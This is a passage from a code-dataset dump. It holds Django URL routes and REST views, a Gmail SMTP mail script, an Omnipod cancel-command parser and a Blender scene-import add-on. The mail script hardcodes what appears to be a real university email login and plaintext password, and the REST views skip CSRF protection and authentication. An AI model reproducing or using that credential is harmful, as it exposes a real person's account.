url(r'^profiles/(?P\\d+)/$', app.views.dashboard, name='lel'),\n url(r'^Asha', app.views.ashalist, name='Asha'),\n url(r'^Cohort', app.views.cohortlist, name='Cohort'),\n url(r'^RequestList', app.views.RequestList, name='RequestList'),\n url(r'^request/(?P\\d+)/$',app.views.request,name=\"requests\"),\n url(r'^request/(?P\\d+)/send_mail',app.views.sendmail,name=\"sendmail\"),\n url(r'^request/(?P\\d+)/deleteuser',app.views.deleteuser,name=\"deleteuser\"),\n\n url(r'^ReqSignUp$', app.views.signup_view2,\n {\n 'template_name': 'app/SignUpReq.html',\n\n },\n name='ReqSignUp'),\n\n url(r'^add/$',app.views.def_view, {'template_name': 'app/add.html',},name='def'),\n url(r'^signup2$',\n #django.contrib.auth.views.login,\n app.views.signup_view2,\n {\n 'template_name': 'app/signup.html',\n 'type':'signup2',\n },\n name='signup2'),\n url(r'^signup$',\n #django.contrib.auth.views.login,\n app.views.signup_view2,\n {\n 'template_name': 'app/SignUpReq.html',\n 'type':'signup2',\n\n\n },\n name='signup'),\n\n url(r'^signup3$',\n #django.contrib.auth.views.login,\n app.views.signup_view3,\n {\n 'template_name': 'app/signup.html',\n 'type':'signup3',\n\n\n },\n name='signup3'),\n\n url(r'^login/$',\n #django.contrib.auth.views.login,\n app.views.login_view,\n {\n 'template_name': 'app/login.html',\n #'authentication_form': app.forms.BootstrapAuthenticationForm,\n #'extra_context':\n },\n name='login'),\n url(r'^logout$',\n django.contrib.auth.views.logout,\n {\n 'next_page': '/',\n },\n name='logout'),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n # url(r'^admin/', include(admin.site.urls)),\n]\n","sub_path":"python_webapp_django/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"470425719","text":"#-*- coding: utf-8 -*-\r\nfrom datetime import date\r\nimport re\r\nimport os\r\nimport smtplib\r\n\r\ntoday = str(date.today())\r\n\r\n#info para email\r\ndestinatario = 'william@alunos.utfpr.edu.br'\r\ntexto = 'Teste de Crawler '\r\n\r\n#logando no email\r\nremetente = 'william@alunos.utfpr.edu.br'\r\nsenha = 'Fzr07br!'\r\n#mensagem do corpo do email\r\nmsg = '\\r\\n'.join([\r\n '%s' % texto + ' - ' + str(today)\r\n ])\r\n\r\n#enviando email\r\nserver = smtplib.SMTP('smtp.gmail.com:587')\r\nserver.starttls()\r\nserver.login(remetente,senha)\r\nserver.sendmail(remetente,destinatario,msg)\r\nserver.quit()\r\n","sub_path":"Crawler/SendEmail.py","file_name":"SendEmail.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"171480903","text":"# file: parse_1f - does the parsing for cancel commond\nfrom byteUtils import *\nfrom decimal import Decimal\n\ndef parse_1f(msg):\n # extract information from the 1f cancel command\n \"\"\"\n Command $1F is the Cancel command. It has the following format:\n\n OFF 1 2 3 4 5 6\n 1f 05 NNNNNNNN AX\n 1f 05 22c1cf8c 02 80f7\n\n 1f (1 byte): Mtype value of $1f specifies a cancel command\n 05 (1 byte): The cancel command always has a fixed length of 05\n NNNNNNNN (4 bytes): Nonce, the 32-bit validator (random looking numbers)\n AX (1 byte): Command byte of the form aaaa0bcd:\n The aaaa (A) nibble in the range of (0..8) and is the type of the Pod alarm/beep type to sound.\n An aaaa value = 0 is no alarm\n = 2 two quick beeps\n = 6 one longer beep\n Values of A larger than 8 are out of range and can lock up a Pod with a constant beep.\n The b ($04) bit being set will cancel any ongoing bolus and will turn off the RR reminder variables set from the $17 Bolus Extra command.\n The c ($02) bit being set will cancel any ongoing temporary basal and will turn off the RR reminder variables set from the $16 Temp Basal command.\n The d ($01) bit being set will cancel the basal program and will turn off the RR reminder variables set from the $13 Basal Schedule command.\n The Pod responds to the $1F command with a $1D status message.\n \"\"\"\n\n msgDict = { }\n msgDict['message_type'] = '1f'\n msgDict['raw_value'] = msg\n\n byteMsg = bytearray.fromhex(msg)\n byteList = list(byteMsg)\n mtype = byteList[0]\n mlen = byteList[1]\n nonce = combineByte(byteList[2:6])\n cancelByte = byteList[6]\n alertValue = (cancelByte >> 4) & 0xF\n cancelBolus = (cancelByte & 0x04) != 0\n cancelTB = (cancelByte & 0x02) != 0\n suspend = (cancelByte & 0x01) != 0\n\n msgDict = { }\n msgDict['message_type'] = '1f'\n msgDict['raw_value'] = msg\n msgDict['mtype'] = mtype\n msgDict['mlen'] = mlen\n msgDict['nonce'] = nonce\n msgDict['cancelByte'] = cancelByte\n msgDict['alertValue'] = alertValue\n msgDict['cancelBolus'] = cancelBolus\n msgDict['cancelTB'] = cancelTB\n msgDict['suspend'] = suspend\n\n return msgDict\n","sub_path":"parse_1f.py","file_name":"parse_1f.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"560472247","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.parsers import JSONParser\nfrom .models import Question\nfrom .serializers import QuestionSerializer\n\n\n@csrf_exempt\ndef questions(request):\n\n if request.method == 'GET':\n questions_list = Question.objects.all()\n serializer = QuestionSerializer(questions_list, many=True)\n return JsonResponse(serializer.data, safe=False)\n\n if request.method == 'POST':\n data = JSONParser().parse(request)\n serializer = QuestionSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data, status=201)\n return JsonResponse(serializer.errors, status=400)\n\n\n@csrf_exempt\ndef question_detail(request, pk):\n try:\n question = Question.objects.get(pk=pk)\n except Question.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == 'GET':\n serializer = QuestionSerializer(question)\n return JsonResponse(serializer.data)\n\n if request.method == 'PUT':\n data = JSONParser().parse(request)\n serializer = QuestionSerializer(question, data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data)\n return JsonResponse(serializer.errors, status=400)\n\n if request.method == 'DELETE':\n question.delete()\n return HttpResponse(status=204)\n\n","sub_path":"clucky/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"228111859","text":"import os\nimport time\nimport bpy\nimport mathutils\nimport platform\n\nSYS = platform.system()\n\nCurrentMat=''\n\n\ndef GenMapName(name):\n name=name.split('.')[0]\n if len(name) > 16:\n name=name.replace('a','').replace('e','').replace('i','').replace('o','').replace('u','')\n name=name.replace('A','').replace('E','').replace('I','').replace('O','').replace('U','')\n name=name.replace('_0','').replace('_','').replace('00','0').replace('00','0').replace('00','0')\n\n if len(name) > 16:\n v=0\n s=''\n for a in name:\n try:\n v+=int(float(a))\n except: \n s+=a\n \n s=s.replace('B','b').replace('C','c').replace('D','d').replace('F','f').replace('G','g')\n s=s.replace('H','h').replace('L','l').replace('M','m').replace('N','n').replace('P','p') \n s=s.replace('Q','q').replace('R','r').replace('S','s').replace('T','t').replace('V','v').replace('Z','z') \n \n s=s.replace('bb','b').replace('cc','c').replace('dd','d').replace('ff','f').replace('gg','g')\n s=s.replace('hh','h').replace('ll','l').replace('mm','m').replace('nn','n').replace('pp','p') \n s=s.replace('qq','q').replace('rr','r').replace('ss','s').replace('tt','t').replace('vv','v').replace('zz','z') \n \n name=\"N%sV%sS%s\" % (len(name),v,s)\n \n return name\n\n\n\ndef DelObj(obj):\n bpy.ops.object.select_name(name=obj.name)\n bpy.context.scene.objects.active = obj\n bpy.ops.object.delete()\n\n\n\ndef stripFile(path):\n lastSlash= max(path.rfind('\\\\'), path.rfind('/'))\n if lastSlash != -1:\n path= path[:lastSlash]\n return '%s%s' % (path, os.sep)\n\n\n\ndef rn(v):\n return \"%.1f\" % v\n\ndef crob(obj):\n sw=True\n for ob in bpy.context.scene.objects:\n if ob.name == obj:\n sw=False\n return sw\n\n\ndef stripPath(path):\n return path.split('/')[-1].split('\\\\')[-1]\n\ndef stripExt(name): \n index= name.rfind('.')\n if index != -1:\n return name[ : index ]\n else:\n return name\n\ndef unpack_list(list_of_tuples):\n l = []\n for t in list_of_tuples:\n l.extend(t)\n return l\n\ndef unpack_face_list(list_of_tuples):\n l = []\n for t in list_of_tuples:\n face = [i for i in t]\n if len(face) != 3 and len(face) != 4:\n raise RuntimeError(\"{0} vertices in face.\".format(len(face)))\n if len(face) == 4 and face[3] == 0:\n face = [face[3], face[0], face[1], face[2]]\n if len(face) == 3:\n face.append(0)\n l.extend(face)\n return l\n\n\ndef line_value(line_split):\n length= len(line_split)\n if length == 1:\n return None\n elif length == 2:\n return line_split[1]\n elif length > 2:\n return ' '.join( line_split[1:] )\n\t\t\n\t\t\n\n\n\n\ndef strip_slash(line_split):\n if line_split[-1][-1]== '\\\\':\n if len(line_split[-1])==1:\n line_split.pop()\n else:\n line_split[-1]= line_split[-1][:-1]\n return True\n return False\n\ndef get_float_func(filepath):\n print(filepath)\n file= open(filepath, 'rU')\n for line in file: \n line = line.lstrip()\n if line.startswith('v'): \n if ',' in line:\n return lambda f: float(f.replace(',', '.'))\n elif '.' in line:\n return float\n return float \n\n\n\ndef load_image(imagepath, dirname):\n\n if os.path.exists(imagepath):\n return bpy.data.images.load(imagepath)\n\n variants = [os.path.join(dirname, imagepath), os.path.join(dirname, os.path.basename(imagepath))]\n\n for path in variants:\n if os.path.exists(path):\n return bpy.data.images.load(path)\n else:\n print(path, \"doesn't exist\")\n return None\n\n\n\n\n\ndef obj_image_load(imagepath, DIR, use_image_search):\n if b'_' in imagepath:\n image = load_image(imagepath.replace(b'_', b' '), DIR)\n if image:\n return image\n\n image = load_image(imagepath, DIR)\n if image:\n return image\n\n print(\"failed to load %r doesn't exist\" % imagepath)\n return None\n\n\n\n\ndef fixCollada(namefile):\n scene = bpy.context.scene\n SCL = scene.SCL \n fin= open(namefile, 'r')\n f= open(namefile.replace('.dae','_FIXED.dae'), 'w')\n sw=1\n sws=0\n swY=False\n for line in fin:\n if 'Y_UP' in line:\n line=line.replace('Y_UP','Z_UP')\n swY=True\n if '' in line: line='\\t1 0 0 0.000'\n if ''in line : \n line=''\n sw=1\n if ''in line : \n line=''\n sw=1\n if ''in line : \n line=''\n sw=1\n if '' in line : sws=0\n if sws==1:\n x=float(line.split()[0]) *SCL\n y=float(line.split()[1]) *SCL\n z=float(line.split()[2]) *SCL\n line=\"%s %s %s\\n\" % (x,y,z) \n if 'Position-array' in line and 'float_array' in line : sws=1\n if '')[1].split('%s %s %s\\n' % (x,y,z)\n if sw==1: f.write(line)\n f.close()\n fin.close()\n\n\t\n\t\n\t\ndef create_materials(filepath,context_material):\n print(' INFO: Start Make Mapping '+ context_material.name)\n DIR= stripFile(filepath)\n material_libs= []\n unique_materials= {}\n unique_material_images= {}\n\n def setMap(mapping,slot):\n if '|' in mapping:\n map = mapping.split('|')[1]\n map=map.split(' ')\n \n if len(map)>0:\n if map[0] == '1':\n slot.extension = 'CLIP'\n slot.use_mirror_x = int(float(map[1]))\n slot.use_mirror_y = int(float(map[2]))\n slot.repeat_x = int(float(map[5]))\n slot.repeat_y = int(float(map[6]))\n slot.use_flip_axis = int(float(map[7]))\n slot.use_alpha = int(float(map[9]))\n slot.invert_alpha = int(float(map[10]))\n\n\n\n def load_material_image(blender_material, context_material_name, imagepath, type, mapping,DIR):\n\n import platform\n SYS = platform.system()\n Nt=True\n path=imagepath.split('|')[0]\n has_data = False\n \n textNameType=GenMapName(path)\n \n textNameType=type+'_'+textNameType\n \n \n #### TROVAMI MAP\n sw=True\n for t in blender_material.texture_slots:\n if t and t.texture.type == 'IMAGE' : \n if textNameType==t.name.split('.')[0]:\n print(' INFO: Start Textures Find '+t.name.split('.')[0])\n try:\n texture=t\n has_data = t.texture.image.has_data\n image=t.texture.image\n texture=t.texture\n mtex=t\n sw=False\n except: pass\n\n\n if sw:\n texture = bpy.data.textures.new(name=textNameType, type='IMAGE')\n image = load_image(path, DIR.replace('Materials','Textures'))\n \n\n\n print(DIR.replace('Materials','Textures')+path)\n \n if image and os.path.isfile(DIR.replace('Materials','Textures')+path):\n texture.image = image\n has_data = image.has_data\n\n\n\n if type == 'Kd':\n if has_data and image.depth == 32:\n if sw: mtex = blender_material.texture_slots.add()\n mtex.texture = texture\n mtex.texture_coords = 'UV'\n mtex.use_map_color_diffuse = True\n mtex.use_map_alpha = True\n\n texture.use_mipmap = True\n texture.use_interpolation = True\n texture.use_alpha = True\n #blender_material.use_transparency = True\n blender_material.alpha = 0.0\n else:\n if sw: \n mtex = blender_material.texture_slots.add()\n mtex.texture = texture\n mtex.texture_coords = 'UV'\n mtex.use_map_color_diffuse = True\n\n setMap(mapping,mtex.texture)\n\n if image: unique_material_images[context_material_name] = image, has_data \n\n elif type == 'Ka':\n if sw: mtex = blender_material.texture_slots.add()\n mtex.use_map_color_diffuse = False\n\n mtex.texture = texture\n mtex.texture_coords = 'UV'\n mtex.use_map_ambient = True\n\n elif type == 'Ks':\n if sw: mtex = blender_material.texture_slots.add()\n mtex.use_map_color_diffuse = False\n\n mtex.texture = texture\n mtex.texture_coords = 'UV'\n mtex.use_map_specular = True\n setMap(mapping,mtex.texture)\n\n elif type == 'Bump':\n if sw: mtex = blender_material.texture_slots.add()\n mtex.use_map_color_diffuse = False\n\n mtex.texture = texture\n mtex.texture_coords = 'UV'\n mtex.use_map_normal = True\n setMap(mapping,mtex.texture)\n\n elif type == 'D':\n if sw: mtex = blender_material.texture_slots.add()\n mtex.use_map_color_diffuse = False\n\n mtex.texture = texture\n mtex.texture_coords = 'UV'\n mtex.use_map_alpha = True\n #blender_material.use_transparency = True\n #blender_material.transparency_method = 'Z_TRANSPARENCY'\n blender_material.alpha = 0.0\n setMap(mapping,mtex.texture)\n\n elif type == 'refl':\n if sw: mtex = blender_material.texture_slots.add()\n mtex.use_map_color_diffuse = False\n\n mtex.texture = texture\n mtex.texture_coords = 'UV'\n mtex.use_map_reflect = True\n setMap(mapping,mtex.texture)\n\n else:\n raise Exception(\"invalid type %r\" % type)\n\n\n try:\n \n map = mapping.split('|')[1]\n map=map.split(' ')\n if len(map)>0:\n print('>>>>>>>>>>>>>>>>SUPERFLUO<<<<<<<<<<<<<')\n if map[0] == '1':\n texture.extension = 'clip'\n print(texture.extension)\n texture.mirror_x = map[1]\n texture.mirror_y = map[2]\n texture.repeat_x = map[3]\n texture.repeat_y = map[4]\n mapping_sX = map[5]\n mapping_sY = map[6]\n mapping_flipXY = map[7]\n img_h = map[8]\n img_alpha = map[9]\n img_alpha_neg = map[10]\n texture\n \n except:print(\"---------TEXTURE ERROR--------------\")\n\n\n\n mtl= open(filepath, 'r')\n \n for line in mtl:\n if line.startswith('newmtl'):\n matName = line_value(line.split())\n #print(matName+' '+ context_material.name) \n context_material_name=context_material.name \n \n #if context_material_name==matName : pass\n \n\n \n line_split= line.split()\n line_lower= (line.lower().lstrip()).replace('\\t','')\n if line_lower.startswith('ka'):\n try:\n context_material.mirror_color=(float(line_split[1]),float(line_split[2]),float(line_split[3]))\n except:()\n elif line_lower.startswith('kd'):\n try:\n context_material.diffuse_color=(float(line_split[1]),float(line_split[2]),float(line_split[3]))\n\n except:()\n elif line_lower.startswith('ks'):\n try:\n context_material.specular_color=(float(line_split[1]),float(line_split[2]),float(line_split[3]))\n except:()\n elif line_lower.startswith('ns'):\n context_material.specular_hardness = int((float(line_split[1])*0.51))\n elif line_lower.startswith('ray_reflect'):\n \n if float(line_split[1]) > 0.001: \n context_material.raytrace_mirror.use=True\n context_material.raytrace_mirror.reflect_factor = float(line_split[1])\n elif line_lower.startswith('reflect_blur'):\n \n context_material.raytrace_mirror.gloss_factor = float(line_split[1])\n\n elif line_lower.startswith('reflect_samples'):\n context_material.raytrace_mirror.gloss_samples = integer(float(line_split[1]))\n elif line_lower.startswith('reflect_depth'):\n context_material.raytrace_mirror.depth = integer(float(line_split[1]))\n elif line_lower.startswith('reflect_maxdist'):\n context_material.raytrace_mirror.distance = integer(float(line_split[1]))\n elif line_lower.startswith('reflect_anisotropic'):\n context_material.raytrace_mirror.anisotropic = float(line_split[1])\n elif line_lower.startswith('ray_refract'):\n ray_refract=float(line_split[1])\n if ray_refract > 0.001: \n context_material.use_transparency=True\n\n context_material.transparency_method == 'RAYTRACE'\n \n context_material.alpha= 1 - ray_refract\n context_material.specular_alpha= 1 - ray_refract # (ray_refract-(ray_refract *2))+1\n context_material.alpha=context_material.specular_alpha\n context_material.raytrace_transparency.fresnel=ray_refract*5\n context_material.raytrace_transparency.fresnel_factor=(ray_refract*4)+1\n context_material.raytrace_transparency.fresnel_factor = float(line_split[1])\n elif line_lower.startswith('ni'):\n context_material.raytrace_transparency.ior = max(1, min(float(line_split[1]), 3))\n elif line_lower.startswith('refract_blur'):\n context_material.raytrace_transparency.gloss_factor = float(line_split[1])\n elif line_lower.startswith('refract_samples'):\n context_material.raytrace_transparency.gloss_samples = integer(float(line_split[1]))\n elif line_lower.startswith('refract_depth'):\n context_material.raytrace_transparency.depth = integer(float(line_split[1]))\n elif line_lower.startswith('refract_limit'):\n context_material.raytrace_transparency.limit = integer(float(line_split[1]))\n elif line_lower.startswith('translucency'):\n context_material.translucency = float(line_split[1])\n elif line_lower.startswith('emit'):\n context_material.emit = float(line_split[1])\n elif line_lower.startswith('sss_scale'):\n context_material.subsurface_scattering.scale.scale = float(line_split[1])\n elif line_lower.startswith('sss_color'):\n context_material.subsurface_scattering.color=(float(line_split[1]),float(line_split[2]),float(line_split[3]))\n elif line_lower.startswith('shader'):\n context_material.diffuse_shader = line_split[1]\n elif line_lower.startswith('roughness'):\n context_material.roughness = line_split[1]\n ### texture\n elif line_lower.startswith('d') or line_lower.startswith('tr'):\n context_material.alpha = float(line_split[1])\n elif line_lower.startswith('map_ka'):\n img_filepath= line_value(line.split())\n\n if img_filepath.split('|')[0]:\n load_material_image(context_material,context_material_name,img_filepath,'Ka',line_lower,DIR)\n elif line_lower.startswith('map_ks'):\n img_filepath= line_value(line.split())\n if img_filepath:\n load_material_image(context_material,context_material_name,img_filepath,'Ks',line_lower,DIR)\n elif line_lower.startswith('map_kd'):\n img_filepath= line_value(line.split())\n if img_filepath.split('|')[0]:\n\n load_material_image(context_material,context_material_name,img_filepath,'Kd',line_lower,DIR)\n elif line_lower.startswith('map_bump'):\n img_filepath= line_value(line.split())\n \n if img_filepath.split('|')[0]:\n load_material_image(context_material,context_material_name,img_filepath,'Bump',line_lower,DIR)\n elif line_lower.startswith('map_displ'):\n img_filepath= line_value(line.split())\n if img_filepath.split('|')[0]:\n \n load_material_image(context_material,context_material_name,img_filepath,'Disp',line_lower,DIR)\n elif line_lower.startswith('map_d') or line_lower.startswith('map_tr'): \n img_filepath= line_value(line.split())\n \n if img_filepath.split('|')[0]:\n load_material_image(context_material,context_material_name,img_filepath,'D',line_lower,DIR)\n elif line_lower.startswith('refl'):\n img_filepath= line_value(line.split())\n if img_filepath:\n load_material_image(context_material,context_material_name,img_filepath,'refl',line_lower,DIR)\n mtl.close()\n\t\n\t\n\n\n\t\n\t\ndef load_Scn(filepath):\n print(' INFO: Start Interchange ')\n from math import pi\n scene = bpy.context.scene\n SCL = scene.SCL #/ 10\n makeNew=False\n makeCamNew=False\n l_from=None\n l_type=None\n l_rot=None\n l_color=None\n l_power=None\n l_name=None\n context_lamp=None\n mtl= open(filepath, 'r')\n\n\n \n \n\n def load_light_image(lamp,imagepath,sname):\n print(\" INFO: fiind texture Light\")\n DIR= stripFile(filepath)\n Nt=True\n ies=False\n for t in bpy.data.textures:\n if t:\n try:\n if t.name.split('.')[0] == sname : Nt=False\n texture=t\n except:\n Nt=False\n\n if Nt:\n \n\n if str(imagepath) != '1': \n imagepath=imagepath.replace('//','\\\\')\n path=DIR+imagepath\n path=path.replace('\\\\\\\\','\\\\')\n \n if SYS=='Windows':\n path=path.replace('/','\\\\')\n else:\n path=path.replace('\\\\','/')\n path=path.replace('//','/').replace('//','/')\n\n\n \n #image = bpy.data.add_image(path)\n image = load_image(path, DIR)\n texture = bpy.data.textures.new(sname)\n texture.type = 'IMAGE' \n texture = texture.recast_type()\n texture.image = image\n\n\n\n for line in mtl:\n ##print( \"INFO :\" + line)\n\n line_split= line.split()\n line_lower= (line.lower().lstrip()).replace('\\t','')\n \n\n if line_lower.startswith('from'):\n l_from = (float(line_split[1])*SCL,float(line_split[2])*SCL,float(line_split[3])*SCL)\n \n elif line_lower.startswith('rot'):\n l_rot = (float(line_split[1]),float(line_split[2]),float(line_split[3]))\n elif line_lower.startswith('lensm'):\n l_lens = float(line_split[1])\n\n\n\n if scene.IMPORT_LIGHT:\n\n if line.startswith('newlight'):\n print(\" INFO: Making New Light\" )\n l_from=None\n l_type=None\n l_rot=None\n l_name= line_value(line.split())\n makeNew=True\n \n if makeNew and l_from and l_rot and l_type and l_name:\n \n if crob(l_name):\n if l_type == 'IES':\n l_type='SPOT'\n ies=True\n l=bpy.ops.object.lamp_add(type=l_type, view_align=False, location=l_from, rotation=(0,0,0)) \n ob = bpy.context.scene.objects.active\n lamp = ob.data\n ob.name=l_name\n lamp.name=l_name\n makeNew=False\n ob.rotation_euler[0]=l_rot[0] * pi / 180\n ob.rotation_euler[1]=l_rot[1] * pi / 180\n ob.rotation_euler[2]=l_rot[2] * pi / 180\n lamp.shadow_method='RAY_SHADOW'\n try:\n lamp.shadow_ray_samples=8\n except:pass\n \n try:\n if line_lower.startswith('type') :\n l_type = line_split[1]\n \n elif line_lower.startswith('power') :\n lamp.energy = float(line_split[1])\n \n elif line_lower.startswith('areax') :\n lamp.size = float(line_split[1])*SCL\n lamp.shadow_method='RAY_SHADOW'\n lamp.shadow_ray_samples_x=8\n lamp.distance=3\n \n elif line_lower.startswith('areay') :\n lamp.shape='RECTANGLE'\n lamp.size_y = float(line_split[1])*SCL\n lamp.shadow_ray_samples_y=8\n \n \n elif line_lower.startswith('color') :\n lamp.color = (float(line_split[1]),float(line_split[2]),float(line_split[3]))\n \n elif line_lower.startswith('texture') :\n #YAFARAY IES\n lamp.ies_file=line_split[1]\n lamp.lamp_type='ies'\n pass \n \n \n elif line_lower.startswith('samples') :\n try: lamp.shadow_ray_samples = int(float(line_split[1]))\n except:() \n try: lamp.shadow_ray_samples_x=int(float(line_split[1]))\n except:()\n try: lamp.shadow_ray_samples_y=int(float(line_split[1]))\n except:()\n \n \n elif line_lower.startswith('texture') and makeNew:\n img_filepath= line_value(line.split())\n if img_filepath:\n \n load_light_image(lamp, img_filepath,\"Lamp_\"+stripExt(stripPath(img_filepath)))\n except:() \n\n if scene.IMPORT_CAMERA:\n if line.startswith('newcam'):\n #print(' INFO: Making New Cam')\n\n l_from=None\n l_type=None\n l_rot=None\n l_lens=None\n l_name= line_value(line.split())\n makeCamNew=True\n \n \n if makeCamNew and l_from and l_rot and l_name and l_lens:\n print(' INFO: Make Cam %s ' % l_name)\n if crob(l_name):\n \n bpy.ops.object.camera_add(view_align=False, enter_editmode=False, location=(0.0, 0.0, 0.0), rotation=(0.0, 0.0, 0.0))\n \n ob = bpy.context.scene.objects.active\n cam = ob.data\n ob.name=l_name\n cam.name=l_name\n ob.location=l_from\n ob.rotation_euler[0] = pi * l_rot[0]/180\n ob.rotation_euler[1] = pi * l_rot[1]/180\n ob.rotation_euler[2] = pi * l_rot[2]/180\n ob.data.clip_end = 5000\n ob.data.clip_start=0.0001\n makeCamNew=False \n cam.lens = l_lens\n print(' INFO: Make Cam %s DONE ' % l_name)\n else:\n print(' INFO: Cam %s FAIL (EXISTING)' % l_name)\n \n \n elif line_lower.startswith('lensm') and makeCamNew==False:\n l_lens = float(line_split[1])\n \n\n \n \n \n \n mtl.close()\n\t\n\t\n\n\ndef load_obj_mot(path):\n print(' INFO: Start Objects animation ') \n from math import pi \n SC = bpy.context.scene\n SCR = SC.render\n SCL = SC.SCL \n FrameRate = float(SCR.fps)\n objects=bpy.context.scene.objects\n for ObjMot in objects:\n filename=path+'Motion/'+( stripExt((ObjMot.name.split('~'))[0]) )+'.mot'\n \n\n \n\n \n \n if os.path.isfile(filename):\n File = open (filename, 'rU')\n CurChannel = -1\n ScaleFlag = 0\n LocX=None\n LocY=None \n LocZ=None\n RotX=None\n RotY=None\n RotZ=None\n ScaleX=None\n ScaleY=None\n ScaleZ=None\n SC.frame_current=1\n cf=0\n for Line in File:\n line=Line.split (' ')\n\n if len(line) > 1:\n ObjMot.keyframe_insert(\"location\")\n ObjMot.keyframe_insert(\"rotation_euler\")\n ObjMot.keyframe_insert(\"scale\") \n SC.frame_current=int(float(line[0]))\n ObjMot.location[0]=float(line[1]) * SCL\n ObjMot.location[1]=float(line[2]) * SCL\n ObjMot.location[2]=float(line[3]) * SCL\n \n\n rx=ObjMot.rotation_euler[0]\n ry=ObjMot.rotation_euler[1]\n rz=ObjMot.rotation_euler[2] \n #print('---------------------------')\n #print(' x=%s y=%s z=%s' % (rx,ry,rz))\n \n \n \n try: ObjMot.rotation_euler[0] = (pi * (float(line[4])) /180) \n except: ObjMot.rotation_euler[0] = 0\n try: ObjMot.rotation_euler[1] = (pi * float(line[5]) /180)\n except: ObjMot.rotation_euler[1] = 0\n try: ObjMot.rotation_euler[2] = (pi * float(line[6]) /180)\n except: ObjMot.rotation_euler[2] = 0\n \n ObjMot.scale[0]=float(line[7])\n ObjMot.scale[2]=float(line[8])\n ObjMot.scale[1]=float(line[9])\n ObjMot.keyframe_insert(\"location\")\n ObjMot.keyframe_insert(\"rotation_euler\")\n ObjMot.keyframe_insert(\"scale\")\n File.close()\n\n\n\n\ndef load_cam_mot(path):\n print(' INFO: Start Cam animation ') \n from math import pi \n\n SC = bpy.context.scene\n SCR = SC.render\n SCL = SC.SCL\n FrameRate = float(SCR.fps)\n objects=bpy.context.scene.objects\n for ob in objects:\n filename=path+'Motion/'+ob.name+'.cam'\n if os.path.isfile(filename):\n \n Fc = open(filename, 'r');\n l = 1;\n readVerts = False;\n readCam = False;\n numFrames = 0;\n\n bpy.ops.anim.keyingset_button_add(all=True)\n bpy.ops.anim.driver_button_add(all=True)\n for curLine in Fc.readlines():\n if (l==1) and ('cRio ' not in curLine):\n file.close();\n break;\n if l > 1:\n lp = curLine.split()\n location = (float(eval(lp[1]) * SCL),float(eval(lp[2]) * SCL),float(eval(lp[3]) * SCL))\n SC.frame_current=(int(float(lp[0])))\n ob.location=location\n ob.rotation_euler[0] = pi * (float(lp[4]))/180\n ob.rotation_euler[1] = pi * (float(lp[5]))/180\n ob.rotation_euler[2] = pi * (float(lp[6]))/180\n ob.data.lens = float(lp[7])\n ob.keyframe_insert(\"location\")\n ob.keyframe_insert(\"rotation_euler\")\n ob.data.keyframe_insert('lens')\n\n \n l += 1;\n Fc.close\n \n try:\n bpy.ops.object.select_name(name=ob.name)\n bpy.ops.view3d.object_as_camera()\n\n except:\n pass \n\n\n\n\ndef load_lamp_mot(path):\n print(' INFO: Start Lamp animation ') \n from math import pi \n SC = bpy.context.scene\n SCR = SC.render\n SCL = SC.SCL\n FrameRate = float(SCR.fps)\n objects=bpy.context.scene.objects\n for ObjMot in objects:\n filename=path+'Motion/'+(ObjMot.name.split('~'))[0]+'.lmp'\n if os.path.isfile(filename):\n\n File = open (filename, 'rU')\n CurChannel = -1\n ScaleFlag = 0\n LocX=None\n LocY=None \n LocZ=None\n RotX=None\n RotY=None\n RotZ=None\n ScaleX=None\n ScaleY=None\n ScaleZ=None\n\n SC.frame_current=1\n\n cf=0\n for Line in File:\n line=Line.split (' ')\n\n if len(line) > 1:\n ObjMot.keyframe_insert(\"location\")\n ObjMot.keyframe_insert(\"rotation_euler\")\n ObjMot.keyframe_insert(\"scale\") \n SC.frame_current=int(float(line[0]))\n ObjMot.location[0]=float(line[1]) * SCL\n ObjMot.location[1]=float(line[2]) * SCL\n ObjMot.location[2]=float(line[3]) * SCL\n \n try: ObjMot.rotation_euler[0] = pi * float(line[4]) /180 \n except: ObjMot.rotation_euler[0] = 0\n try: ObjMot.rotation_euler[1] = pi * float(line[5]) /180 \n except: ObjMot.rotation_euler[1] = 0\n try: ObjMot.rotation_euler[2] = pi * float(line[6]) /180 \n except: ObjMot.rotation_euler[2] = 0\n \n ObjMot.scale[0]=float(line[7])\n ObjMot.scale[1]=float(line[8])\n ObjMot.scale[2]=float(line[9])\n ObjMot.keyframe_insert(\"location\")\n ObjMot.keyframe_insert(\"rotation_euler\")\n ObjMot.keyframe_insert(\"scale\")\n File.close()\n\nDEBUG= True\nDEBUG= False\n\nfrom bpy.props import *\nScene = bpy.types.Scene\nScene.SCL = FloatProperty(attr=\"SCL\",name=\"Clamp Scale\", description=\"Clamp the size to this maximum (Zero to Disable)\", min=0.000, max=1000.0, soft_min=0.001, soft_max=1000.0, default=1.00)\nScene.IMPORT_GEOMETRY = BoolProperty(attr=\"IMPORT_GEOMETRY\",default= True)\nScene.IMPORT_GEOMETRY_PIVOT = BoolProperty(attr=\"IMPORT_GEOMETRY_ANIMATION\",default= True)\nScene.IMPORT_GEOMETRY_ANIMATION = BoolProperty(attr=\"IMPORT_GEOMETRY_ANIMATION\",default= True)\nScene.IMPORT_CAMERA = BoolProperty(attr=\"IMPORT_CAMERA\",default= True)\nScene.IMPORT_LIGHT = BoolProperty(attr=\"IMPORT_LIGHT\",default= True)\nScene.IMPORT_MATERIAL= BoolProperty(attr=\"IMPORT_MATERIAL\",default= True)\nScene.IMPORT_CAMERA_ANIMATION = BoolProperty(attr=\"IMPORT_CAMERA_ANIMATION\",default= 